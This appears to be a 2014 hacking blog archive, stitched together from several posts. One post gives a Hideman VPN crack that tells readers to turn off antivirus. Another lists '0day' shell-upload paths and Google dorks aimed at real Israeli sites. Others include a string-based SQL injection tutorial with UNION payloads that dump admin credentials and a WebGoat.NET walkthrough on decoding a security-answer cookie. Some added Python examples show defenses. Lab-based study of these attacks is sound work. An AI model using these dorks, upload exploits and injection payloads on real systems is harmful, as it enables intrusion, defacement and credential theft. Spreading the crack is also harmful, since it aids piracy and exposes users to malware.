
18 July 2014

HideMan2 Premium vpn Life Time

Hideman 2

Hideman application creates VPN connection to one of our servers located in 16 countries around the world. We try to add new servers as fast as we can.
VPN connection protects your privacy and increases your security level.
This crack will remove the hour limit of Hideman 2, letting you stay connected to the VPN server forever.
  • How to Crack ?

    1. Install Hideman 2
    2. Exit from Hideman using system tray icon (important)
    3. Turn off any virus guards
    4. Run Hideman 2 Crack, and press crack button
    5. If asked browse and select ‘Hideman.exe’ file from Hideman installation path
    6. Done :)  
    How to fix the Disconnected issue?
    Sometimes you will continuously get a disconnected message in Hideman after applying the crack. Follow the steps given below to fix it :)
  • Run Hideman
  • Press +1/1 button under Hours (nothing will happen other than loading, it's OK)
  • Go to Payment Menu > Click 1 Month option (it will open a web page, just close it)
  • Now close Hideman completely using system tray icon
  • Go to Hideman installation path and delete ‘pref.cdat’ file (example path : C:\Program Files\Hideman\bin)
  • Now open Hideman and it will work normally :) [If this didn't work, re-apply the crack at step 5]

 Download:

HideMan2+cracke.rar 


13 July 2014

Testing Your Sql injection Skills (Create Your Own Penetration Testing Lab)

Hello Guys

It's me, 4n0nkh4n.

This tutorial is about testing your knowledge of SQL injection.

If you don't know about SQL injection, read these topics first:

    1. Step by step Sql Injection
    2. String Based Sql Injection

So, on to the topic now :p

If you have knowledge of SQL injection and want to test it, or you want to practice SQL injection attacks:

                  *Just go Here

There are many levels to solve :)

If you did it, then here is one more thing to do.

 

Create Your Own Penetration Testing Lab with DVWA :-

 

What is DVWA ?

Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment.

Download DVWA Now

Download XAMPP Now

You need XAMPP for this lab, to run DVWA on a local server.

After downloading, install XAMPP as administrator, then start the Apache, MySQL and FileZilla services. If another application is already using the ports, you will get an error. In my case, port 443 is used by VMware Workstation, so just disable that service with Task Manager.

Now extract the DVWA file that you downloaded from the link mentioned above and paste it into the C:\xampp\htdocs folder.

Now navigate to https://127.0.0.1/dvwa and click on the Setup option to start the setup.

After setup, enter the credentials username = admin and password = password to log in.

Now click on the Setup option and then on the Create Database option to create your database.

Now your penetration testing lab is ready for your security application testing.

Enjoy your Penetration Testing Lab with DVWA.

Hope you like my post, Create Your Own Penetration Testing Lab with DVWA. Don't be selfish, please share it with others. :p


#4n0nkh4n

./Ultimate_hackers

 

 

 

 



Israel Private 0Day Shell Upload Exploits ASP|PHP

Hey Guyz ..Today I found some FRESH Private Israel 0Day Exploits . So i thought of sharing with you all....So lets Start....
1). First 0Day Shell Upload ASP | PHP

# Google Dork -|-
'prod1.aspx?pid=' site:il or You can also create your own Dork
# Exploit Upload 1 -|-
/admin/adminbanners.aspx
# Exploit Upload 2 -|- 
/admin/AdminPics.aspx
When you upload your asp or php shell just Check Code Source of the page you will see your url


2). Second 0day Upload

# Dork -|- 
inurl:/index.php?categoryID= site:il
inurl:/index.php?ukey=auth
inurl:/index.php?ukey=feedback
inurl:/index.php?ukey=pricelist
inurl:/index.php?ukey=auxpage_faq
inurl:/shop/index.php?categoryID=
inurl:ukey=product&productID=
# Exploit -|-
/published/common/html/xinha/plugins/ImageManager/manager.php
# Exploit -|-
/published/common/html/xinha/plugins/ExtendedFileManager/manager.php

3). Third 0day Upload Blind Sql Injection

 This just Targets with havij or manually and admin page of the script is www.target.co.il/QAdmin
# Dork -|- 

intext:cybercity site:il
inurl:index.php?id= <-- Page 4
intext:medicine site:il
inurl:index.php?id= <-- page 2

09 July 2014

String Based SQL injection

What is string-based SQL injection, and how do you notice it?
To keep this simple: string-based SQL injection is when the site is vulnerable to SQL injection, but the usual test queries don't produce the results we expect, because the parameter sits inside a quoted string in the SQL statement and our input is treated as part of that string.
Common signs that a site is vulnerable to string-based injection are:

Code:
"order by" doesn't work, example: order by 100--
"group by" doesn't work
"having 1=2" doesn't work
queries related to SQL injection don't work (the site shows a normal page even though it is vulnerable to SQLi)



Solution to this issue in order to hack a site with string-based SQL injection
The answer to this problem is to use the following format while trying to hack a site with SQLi:
Code:
http://site.com/index.php?id=10' order by 1000--+
That will show us the error, hence displaying the results according to our query.
The point here is that we used the quote ' and the + sign in our query: the quote closes the string the parameter sits in, and the + is decoded as a space, which MySQL needs after -- to treat the rest of the line as a comment.
Code:
id=X' order by N--+

All right, now that you've got the point, let's try string-based injection with some of the other types of SQL injection, shall we?


String-Union Based SQL injection
1. Obtaining the number of columns (in this example, we'll use 10 columns)
Code:
http://www.site.com/index.php?id=234' order by 11--+
The result shows an error, so we'll assume 10 columns for this example

2. Obtaining the Databases
Code:
http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(schema_name,0x0a),7,8,9,10 from information_schema.schemata--+
Results will display the databases on their website
Note: If you don't know anything about UNION Based SQL injection, I suggest you read one of my tutorials to progress further in this step

3. Obtaining the Tables from the current Database
Code:
http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(table_name,0x0a),7,8,9,10 from information_schema.tables where table_schema=database()--+
Results will display the table names of the current database
For this example, we'll be using the table name: "admin"

4. Obtaining Column names from a specific table (which in this example is "admin")
Code:
http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(column_name,0x0a),7,8,9,10 from information_schema.columns where table_name=0x61646d696e--+

Results will display the column names from the current table
To convert plain text to hex, use: http://www.swingnote.com/tools/texttohex.php

For this example, we'll use "username" and "password" as our column names

5. Obtaining Data from Column names
Code:
http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(username,0x3a,password,0x0a),7,8,9,10 from admin--+

Results will display the data given by the columns you have chosen

This can be also done with Error Based SQL injection, Blind Based and other types of SQL injection
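
Why the closing quote matters, and what removes the problem, shown as an added example that is not part of the original post. An in-memory SQLite database stands in for the site's PHP/MySQL back end, and the tables, sample rows and function names are constructed for illustration.

```python
import sqlite3


def make_db():
    """Constructed sample data: one public table, one that must stay private."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE articles (id TEXT, title TEXT)")
    db.execute("CREATE TABLE admin (username TEXT, password TEXT)")
    db.executemany("INSERT INTO articles VALUES (?, ?)",
                   [("10", "Welcome"), ("234", "News")])
    db.execute("INSERT INTO admin VALUES ('root', 'constructed-hash')")
    return db


def lookup_vulnerable(db, article_id):
    """String-context query built by concatenation (the flaw the post relies on)."""
    sql = "SELECT id, title FROM articles WHERE id = '" + article_id + "'"
    try:
        return "ok", db.execute(sql).fetchall()
    except sqlite3.Error as exc:
        return "error", str(exc)


def lookup_safe(db, article_id):
    """Same lookup with a bound parameter: input cannot leave the value slot."""
    sql = "SELECT id, title FROM articles WHERE id = ?"
    return "ok", db.execute(sql, (article_id,)).fetchall()


# URL-decoded forms of the probes in the post ("+" reaches the server as a space).
PROBES = {
    "plain id": "10",
    # No quote: the whole probe stays inside the '...' literal, so it is data.
    "no quote": "10 order by 1000-- ",
    # Quote: the literal is closed early and the rest is parsed as SQL.
    "with quote": "10' order by 1000-- ",
    "union": "-234' UNION SELECT username, password FROM admin-- ",
}


def run_probes():
    """Return {probe name: (vulnerable result, parameterized result)}."""
    db = make_db()
    return {name: (lookup_vulnerable(db, value), lookup_safe(db, value))
            for name, value in PROBES.items()}


if __name__ == "__main__":
    for name, (vuln, safe) in run_probes().items():
        print(f"{name:10}  concatenated={vuln}  parameterized={safe}")
```

With the bound parameter, every probe is compared against `id` as a plain string, so neither the error nor the `admin` row can be produced.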

Top 10 Free Vpn Services!!!



Top 10 Free VPN Services
First of all, let's talk about what a VPN is.
VPN simply means “Virtual Private Network”. Basically, it’s a private network which lets users connect to other users or remote sites over a public network, usually the Internet. It uses “virtual” connections routed through the Internet from the company’s private network to the remote site or employee instead of physical connections. In short, it is a private network constructed within a public network infrastructure, such as the global Internet.
Why You Need VPN

To protect privacy, either on a LAN or a public hotspot.
Anonymous Internet surfing: full anonymity by hiding your real IP address.
Bypass geographical blocks from certain websites.
Unlike a proxy, you get a secured connection for all programs you are using.
Quality network ensures your VPN service will be fast wherever you are in the world.
Protection against your ISP.
Bypass ISP blocking for VoIP applications like Skype.

Top 10 Free VPN Services
1. UltraVPN
(https://www.ultravpn.fr/) It is a free VPN client/ server SSL VPN solution based on OpenVPN. It encrypts and anonymizes your network connection making your connection safe and secure. You need to download and install the client and create a (username, password) to use this service.
2. Logmein Hamachi
( https://secure.logmein.com/products/hamachi2/download.aspx )
It’s a great free VPN service from the well-known guys behind the LogMeIn remote apps management service. It’s free for non-commercial and personal use. Features:
  • No hardware required – A quick, simple and easy-to-use VPN that just works
  • Secure communications – Encrypted tunneling across public and private networks
  • Flexible networking – Combines the ease of an SSL VPN with the connectivity of an IP-sec VPN
  • Web-based management – Deploy to anyone, manage from anywhere, access anytime
  • Free for non-commercial usage – Absolutely free for non-commercial use.
3. Packetix
(http://www.packetix.net/en/)
It's a Japanese free VPN solution with technology developed by SoftEther Corporation. You can use the PacketiX.NET online test service for free. Here’s what you can do with this service: you can create your private Virtual VPN Hub, and you can configure and use the hub for free. You can use all functions the PacketiX VPN software has to offer, such as creating a remote connection to your home network or uniting local networks at different sites. With our system, you won’t need to set up a VPN server with a global IP address yourself. The VPN server administration is done over an easy web interface.
4. Open VPN
( http://openvpn.net/index.php/opensource/downloads.html )
OpenVPN drives UltraVPN. OpenVPN is an SSL/TLS-based VPN that provides high security and privacy. The biggest difference between PPTP VPN and OpenVPN is that you need to install OpenVPN client software to use an OpenVPN service, and OpenVPN does NOT work on mobile devices such as iPhone, iPad, Windows Mobile and Android. But OpenVPN works on Windows, Mac and Linux.
5. Your Freedom
( http://www.your-freedom.net/index.php?id=downloads )
This one is basically not a VPN service, but it performs almost the same function with great ease, hence I included it in this list. It provides both a free and a paid service. The free service is limited to six hours of usage per day (up to 18 hours per week). You need to install a client on your system and have a user name and password to use it.
6. Macro VPN
(http://www.macrovpn.com/)
Just like other services, MacroVPN offers a free VPN service for users. It provides a 128-bit PPTP encrypted VPN connection service and protection on Wi-Fi hotspots. It normally assigns US-based IPs.
7. Hotspot Shield
( http://hotspotshield.com/?lg=en)
Hotspot Shield is a free VPN service which protects your entire web surfing session, securing your connection on both your home Internet network and public Internet networks (both wired and wireless). Hotspot Shield protects your identity by ensuring that all web transactions (shopping, filling out forms, downloads) are secured through HTTPS. Here also, you need to download and install a client to use it on your computer.
8. Its Hidden
(http://itshidden.com/)
ItsHidden is part of the Port 80 Limited (Seychelles) company, providing both free and paid VPN services. It creates a secure connection, encrypting all the data, protecting your privacy and securing you. You don't need to install any software. ItsHidden.com works on all platforms including Windows, Mac, Linux, iPhone etc.
9. CyberGhost
(http://cyberghostvpn.com/)
This is a free VPN service from Germany which routes you through a German IP. The free service is limited to 10GB of traffic every month, which is more than enough for surfing websites, chatting and email.
10. Gpass
( http://gpass1.com/gpass/)
This is another free VPN service product of the World’s Gate, Inc which offers Internet solutions for information freedom in China and other regions. You need to install a software client to use this.

06 July 2014

How to Set Up Port Forwarding on a Router

Port forwarding opens certain ports on your home or small business network, usually blocked from access by your router, to the Internet. Opening specific ports can allow games, servers, BitTorrent clients, and other applications to work through the usual security of your router that otherwise does not permit connections to these ports. Follow this guide to forward the ports you need, regardless of your operating system.

Steps

  1. Enter your router’s IP address into the address bar of a web browser. This will open your router’s configuration page. For most routers, this will be 192.168.0.1, 192.168.1.1, or 192.168.2.1. However, if you want to figure out the IP, here's how to do it:[1]
    • For Windows: Open the command prompt and enter ipconfig /all. The router’s IP address is usually the same as the Default Gateway.
    • For Mac: Open the terminal and enter netstat -nr.
    • For Linux: Open the terminal and enter route.
  2. Enter your username and password. If you've already configured the security settings for your router, enter the username and password you chose then. If not, here are some of the most common default logins:[2]
    • On Linksys routers, type "admin" for both the username and the password.
    • On Netgear routers, type "admin" for the username and "password" for the password.
    • On other routers, try leaving the username empty and entering "admin" for the password.
    • You can visit sites such as RouterPasswords.com and enter your router’s model to find the default password.
    • If you've forgotten your login information, you can press the reset button on your router to reset it to factory defaults. You can then look up the factory default settings online.
  3. Find the Port Forwarding section. Each router will be slightly different. Common labels are Port Forwarding, Applications, Gaming, Virtual Servers. If you don't see one of these or something similar, try Advanced Settings and look for a Port Forwarding subsection.
  4. Find a preconfigured entry. Many routers will have a dropdown menu with preconfigured options for well-known applications. If you need to open ports for one of these applications, select it from the list.
  5. Create a custom entry. If the program you want to add is not listed, you will need to create a custom port forwarding entry. Each router will have a slightly different way of doing this, although the required information is the same for any router:
    • Enter a name for the service. Name it something related to the program so that you know what the entry is for.
    • Choose the service type. This can be TCP, UDP, or both. The service type depends on what program you are unblocking. If you are unsure, select the TCP/UDP option.
    • Select the ports you wish to use. If you only want one port open, enter the same number in Start and End. If you wish to open a range of ports (say 5), you might type 3784 in Start and 3788 in End.
    • Select the internal IP address to assign the port forwarding to. This is the IP address of the computer running the application that you are unblocking. Check out the guides for PC or Mac to find your internal IP.
  6. Save your settings. You may have an Apply button instead of Save. You might need to restart your router for them to take effect.

30 June 2014

How To Use VPN in Windows Phone 8.1

Use a VPN connection

At a coffee shop and need to get to a site on your company's intranet? Or using an app from your company at home? With virtual private networking (VPN), you can do these things from your Windows Phone—just as if you were in the office. VPN gives you a secure connection to your company's network, so you can send and receive private information using a Wi-Fi or cellular data connection.

To get a VPN profile on your phone

The first step is to get a VPN profile onto your phone. There are two ways to get one:
  • Set up a workplace account to automatically get a VPN profile from your company.
  • Create a VPN profile on your own. (You can learn how later in this topic.) When you do this, you'll need to contact your company's support person to get the VPN connection settings for your organization.

Note

VPN is only available on Windows Phone 8.1. Check to see which software version you have and find out if an update is available.

To connect to a VPN

Once you have a VPN profile on your phone, you're ready to connect.
  1. In the App list, tap Settings > VPN.
  2. Tap and hold the VPN profile name, and then tap Edit.
  3. In the User name and Password boxes, type your user name and password.
  4. To connect to the VPN, do one of the following, depending on what type of profile you're using:
    • If the VPN profile has Automatic listed under it, your phone will automatically connect to the VPN when you try to access information on your company's network.
    • If the VPN profile has Manual listed under it, tap the profile to connect to the VPN, and then use the app that accesses data on your company's network or visit a company intranet site.

Note

The icons at the top of your screen will show you when you're connected to the VPN. One icon (VPN over Wi-Fi) appears when you're connected over Wi-Fi, and another (VPN over cellular data) shows when you're connected over cellular data.

To create a VPN profile

If you don't have a VPN profile on your phone, you'll need to create one on your own. Before you start, contact your company's support person to get the VPN connection settings for your organization.
  1. In the App list, tap Settings > VPN.
  2. Set Status to On, and then tap Add.
  3. In the Server name or IP address box, type the server name or IP address of your VPN server.
  4. Tap Type and choose the type of VPN connection you want to create.
    If an SSL VPN app is required and you don't have one installed yet, tap the link to download one from the Store.
  5. Tap Connect using, and choose the method you want to use to connect.
  6. In the User name and Password boxes, type your user name and password.
  7. To automatically connect to the VPN when a company app or site requires it, set Connect automatically to On.
  8. For Send all traffic, do one of the following:
    • To have all data you send and receive go over the VPN, set Send all traffic to On.
    • To only have data that requires access to your company's network or intranet go over the VPN connection, set Send all traffic to Off, tap Domains and IP ranges, and then enter the domain names and IP ranges that are protected. Only data that's sent and received from those domains or IP addresses will go over the VPN connection. Other data that's sent or received won't go over the VPN.
  9. In the Profile name box, type a name for your profile.
  10. Tap Advanced, and then enter any additional settings you need to for your organization's VPN.
    You might need to contact your company's support person to get additional information, such as the Proxy settings and DNS suffix to use for your company's network.
  11. Press the Back button on your phone to go back to the Add profile screen, and then tap Save.

29 June 2014

Free VPN • 100% Free PPTP and OpenVPN Service

Vpnbook



Free OpenVPN and PPTP
Surf Anonymously
100% Free VPN Service

PPTP VPN:

  • Free PPTP VPN Account (Easy to setup, no need to download any software, works with all Windows, Mobile and PS3 Devices)
    • Server #1: euro195.vpnbook.com
    • Server #2: euro213.vpnbook.com
    • Server #3: uk180.vpnbook.com (UK VPN - optimized for fast web surfing; no p2p downloading)
    • Server #4: us1.vpnbook.com (US VPN - optimized for fast web surfing; no p2p downloading)
    • Server #5: us2.vpnbook.com (US VPN - optimized for fast web surfing; no p2p downloading)
    • Username: vpnbook
    • Password: spa5urEp
    • More servers coming...

OpenVPN:

How Hackers hack any account using Authentication flaws - 1st


Hello, buddies. My last post was about Web Server Hacking through Command Injection, and as you know, Injection is the most dangerous web application vulnerability and the 2nd is Session Management and Authentication flaws (as per the OWASP Top 10 Vulnerabilities 2013). So today we'll learn about authentication flaws.

What are Authentication Flaws?

It is a little tough to describe an authentication flaw. Developers frequently build custom authentication and session management schemes, but building these correctly is hard. As a result, these custom schemes frequently have flaws in areas such as logout, password management, timeouts, remember me, secret question, account update, etc. Finding such flaws can sometimes be difficult, as each implementation is unique. Such flaws may allow some or even all accounts to be attacked. Once successful, the attacker can do anything the victim could do. Privileged accounts are frequently targeted.

Finding an authentication flaw isn't easy. You'll have to analyze the HTTP data, how the web app works, the encoding it uses and how input gets validated; you have to become a clever hacker to find one. It's an art in itself.


Authentication Flaw Exploitation Tutorial
So today we'll go through a simple authentication vulnerability exploitation tutorial. It's pretty amazing, just follow the steps below.

Requirements:
Start the OWASP-BWA virtual machine, open the homepage and click on WebGoat.NET. It is a penetration testing box for learners and beginners in ethical hacking and security research.

You'll be redirected to the homepage. Just click on the blue Setup Database button.

Now navigate to: WebGoat Coins Customer Portal > Forgot Password

Here, as you know, every website that uses login forms has member accounts and a database of passwords and IDs. So it definitely has a password recovery option, in case you forget your password and need to retrieve it. But often, web applications have authentication flaws; you just need to understand how the application works and what type of security it uses. So now, assume that you are a hacker and WebGoat.NET is your target. Assume this is a popular social networking or business website and it contains an authentication flaw that you need to find and exploit. The flaw is in the forgot-password feature, which leaves the security question answer in Base64-encoded text; you need to crack it to hack any user's account.

Authentication flaws are a little hard to find but very interesting; you just have to understand the web application's logic and the method it uses to authenticate users.

  • Back to the tut, guys! Now you need to get the email of any user. Just type any letter, like a or m, and it will automatically suggest an email. Choose any one; e.g. I'm using this email: sky@havelzbyszekco.com.

  • Click on Proceed and you'll get the security question. Now you have to find the authentication flaw to hack the security question.

  • So I'm trapped here: I can't get the password until I provide the right security question answer. Now my question is, where does the web application store this security question answer to validate it, and how does it work? Let's capture this in Burp Suite and understand it.
Commonly, web applications leave the security question answer in the source code, a cookie, parameters, etc. It can be anywhere; you have to use logic, tools and a hacker's mind to work out where it is and how it works.

  • Just type any bogus answer and click on Recover Password, then start analyzing the parameters, source code, cookies and all content that passes between the browser and the web server. I'm using Burp Suite.

  • Guys, as you all know it is already vulnerable, so we don't need to find it. Just study the Burp Suite capture and you'll see one cookie named encr_sec_qu_ans=. Well, this contains the question's answer.
  • As I told you, web applications validate the user's answer in many ways, through a cookie, the source code or even parameters. Here the web app is using Base64-encoded text in a cookie to validate the user's security question answer. Fine! Let's decode it:

  • Select the Base64-encoded text > right-click on it and Send to Decoder.

  • Well, now it's simple: just click on Decode as Base64.

  • Sounds pretty cool! You'll get another Base64-encoded string. Web apps mostly do this to protect the data as much as they can, so decode it again.

  • Wow! By now I hope you've understood what exactly authentication flaws are: it is a kind of logic for understanding a web application and hacking it. So we got an answer, CALIFORNIA! It is not necessary that every website uses the same method to validate users' security answers; maybe they do but with a different scheme like MD5, SHA-1, SHA-256 or any other. You just need to become a clever hacker to understand it.
  • We've successfully exploited the authentication flaw in WebGoat.NET. Now go back to the browser, enter the correct answer and click on Recover Password.

Well, this is what is called an authentication flaw. Now you can hack any user's account without any social engineering. There are many flaws of this kind in web applications; we just need to understand how they work.
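
The weakness in this walkthrough next to a server-side alternative, as an added example that is not WebGoat.NET's code. The cookie layout (the answer wrapped in two Base64 layers) follows the steps above, while `RecoveryStore`, its method names and the sample account are hypothetical.

```python
import base64
import binascii
import hashlib
import hmac
import secrets


def weak_cookie(answer: str) -> str:
    """What the walkthrough found: the answer itself, Base64-encoded twice."""
    return base64.b64encode(base64.b64encode(answer.encode())).decode()


def peel_base64(value: str, max_layers: int = 5):
    """Audit helper: strip Base64 layers while the result stays printable text.

    Returns (layers_removed, text). Encoding has no key, so any holder of the
    cookie can do the same; stacking layers adds no secrecy.
    """
    data = value.encode()
    layers = 0
    while layers < max_layers:
        try:
            decoded = base64.b64decode(data, validate=True)
        except (binascii.Error, ValueError):
            break
        if not decoded or not decoded.isascii() or not decoded.decode().isprintable():
            break
        data, layers = decoded, layers + 1
    return layers, data.decode()


class RecoveryStore:
    """Hardened flow: the answer never leaves the server, in any encoding."""

    def __init__(self):
        self._answers = {}   # account -> (salt, digest), written at enrolment
        self._pending = {}   # opaque token -> account, one attempt per token

    @staticmethod
    def _digest(answer: str, salt: bytes) -> bytes:
        # Normalize case and spacing, then apply a salted, slow hash.
        normalized = " ".join(answer.lower().split()).encode()
        return hashlib.pbkdf2_hmac("sha256", normalized, salt, 200_000)

    def enroll(self, account: str, answer: str) -> None:
        salt = secrets.token_bytes(16)
        self._answers[account] = (salt, self._digest(answer, salt))

    def start(self, account: str) -> str:
        """Cookie value for the recovery page: random, meaningless off-server."""
        token = secrets.token_urlsafe(32)
        self._pending[token] = account
        return token

    def verify(self, token: str, supplied: str) -> bool:
        account = self._pending.pop(token, None)   # token is single-use
        if account is None or account not in self._answers:
            return False
        salt, digest = self._answers[account]
        return hmac.compare_digest(digest, self._digest(supplied, salt))


if __name__ == "__main__":
    print(peel_base64(weak_cookie("CALIFORNIA")))      # constructed sample cookie
    store = RecoveryStore()
    store.enroll("user@example.test", "California")   # constructed account
    print(store.verify(store.start("user@example.test"), "california"))
```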





The phrase I repeated most was: just try to understand how the web application works! I hope you understand what I mean. To become a clever hacker, learn programming, networking, web app architecture and logic. We have many kinds of ethical hacking articles, books, tools, posts, tricks, tutorials and online books like D Hacker Drive.
Thank you for reading my post. Do share it if you like it, and as always feel free to comment and let me know your problem. Sharing is caring :)




#Copied :D